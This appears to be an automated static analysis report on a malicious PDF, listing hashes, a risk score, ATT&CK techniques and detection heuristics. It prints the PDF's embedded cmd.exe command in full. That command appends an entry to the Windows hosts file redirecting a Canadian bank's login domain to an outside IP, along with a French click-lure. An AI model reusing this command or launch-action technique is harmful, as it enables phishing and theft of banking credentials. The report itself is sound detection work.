Malicious PDF — malware analysis report

Static analysis result for SHA-256 534de7f0fe574218…

MALICIOUS

PDF

1.2 KB
MD5: 69dc1dd84d2fc33dba0fa0d2557efda1 SHA-1: 045586f7666461c1c4ce9d8f38a98d7e598d1ae4 SHA-256: 534de7f0fe5742189be10924dcd32d391dd4064591b0a03afcbc65012f68eb98
120 Risk Score

Malware Insights

MITRE ATT&CK
T1204.002 Malicious Link T1059.003 Windows Command Shell

The PDF file contains a launch action that executes cmd.exe. The command executed attempts to modify the hosts file by mapping 'easyweb.tdcanadatrust.com' to a local IP address, likely to facilitate a phishing attack. The document body reinforces this by instructing the user to copy and paste the domain into their browser.

Heuristics 2

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • /Launch action target: cmd.exe critical PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters '/c echo 125.234.32.58 easyweb.tdcanadatrust.com>> C:\\Windows\\System32\\drivers\\etc\\hosts Cliquez sur "Open/Ouvrir" pour visualiser ce document!' — references a known-dangerous executable (cmd, PowerShell, etc.).

Open this report in the interactive analyzer, or submit your own file for analysis.